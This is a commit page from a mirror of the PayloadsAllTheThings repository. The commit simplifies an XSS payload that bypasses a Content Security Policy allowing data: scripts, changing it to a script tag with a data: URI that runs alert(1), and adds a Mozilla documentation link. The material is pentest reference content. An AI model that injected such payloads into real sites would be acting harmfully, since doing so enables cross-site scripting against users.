Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-12 14:22:47 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update XSS README.md

Browse source 
Remove unnecessary complexity from CSP bypass payload
This commit is contained in:
Markus 2021-10-01 16:10:23 +02:00 committed by GitHub
parent 0024e2a3a9
commit 7996b4f905
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
XSS Injection/README.md
View file

@ -1072,10 +1072,10 @@ Works for CSP like `script-src self`
### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
Works for CSP like `script-src 'self' data:`
Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
```javascript
<script ?/src="data:+,\u0061lert%281%29">/</script>
<script src="data:,alert(1)">/</script>
```